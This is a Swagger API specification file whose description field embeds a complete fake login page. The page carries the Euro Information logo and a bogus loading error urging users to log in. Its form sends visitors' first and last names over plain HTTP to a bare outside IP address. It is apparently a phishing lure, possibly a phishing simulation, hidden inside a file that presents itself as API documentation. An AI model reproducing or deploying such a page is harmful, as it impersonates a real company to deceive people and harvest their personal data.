swagger: '2.0'
info:
  version: 1.0.0
  title: Login Page
  description: |
    <div class="login-form">
      <!-- Logo -->
      <div style="text-align: center; margin: 20px;">
        <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/7/7f/Euro_Information_Logo.svg/320px-Euro_Information_Logo.svg.png"
             alt="Euro Information Logo" style="max-width: 200px;">
      </div>

      <!-- Error Message -->
      <div style="width: 100%; max-width: 400px; margin: 20px auto; padding: 20px; background: #f8d7da; border-radius: 8px; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);">
        <div style="background-color: #f8d7da; color: #721c24; padding: 16px 20px; border-radius: 4px; border: 1px solid #f5c6cb; font-size: 16px; text-align: center;">
          <strong>An error occurred while loading, please log in.</strong>
        </div>
      </div>

      <!-- Login Form -->
      <div class="heading">
        <h1 style="text-align: center; font-size: 24px; color: #333; margin-bottom: 20px;">Login Page</h1>
        <div class="form-container" style="width: 100%; max-width: 400px; margin: 0 auto; padding: 20px; background: #fff; border-radius: 8px; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);">
          <form action="http://64.226.119.233/participation" method="post" class="form-signin">
            <div class="form-group" style="margin-bottom: 15px;">
              <label for="username" style="font-size: 14px; color: #555; display: block; margin-bottom: 5px;">Prénom</label>
              <input type="text" name="prenom" size="20" style="width: 100%; padding: 10px; font-size: 14px; border: 1px solid #ccc; border-radius: 4px;" required>
            </div>
            <div class="form-group" style="margin-bottom: 15px;">
              <label for="password" style="font-size: 14px; color: #555; display: block; margin-bottom: 5px;">Nom</label>
              <input type="text" name="nom" size="20" style="width: 100%; padding: 10px; font-size: 14px; border: 1px solid #ccc; border-radius: 4px;" required>
            </div>
            <div class="form-group" style="margin-top: 20px;">
              <button type="submit" class="btn btn-default" style="width: 100%; padding: 12px; background-color: #0055A4; border: none; color: white; font-size: 16px; border-radius: 4px; cursor: pointer; transition: background-color 0.3s;">Login</button>
            </div>
          </form>
        </div>
      </div>

      <!-- Footer with your name -->
      <div style="position: fixed; bottom: 10px; right: 10px; font-size: 12px; color: #888;">
        
      </div>
    </div>

paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
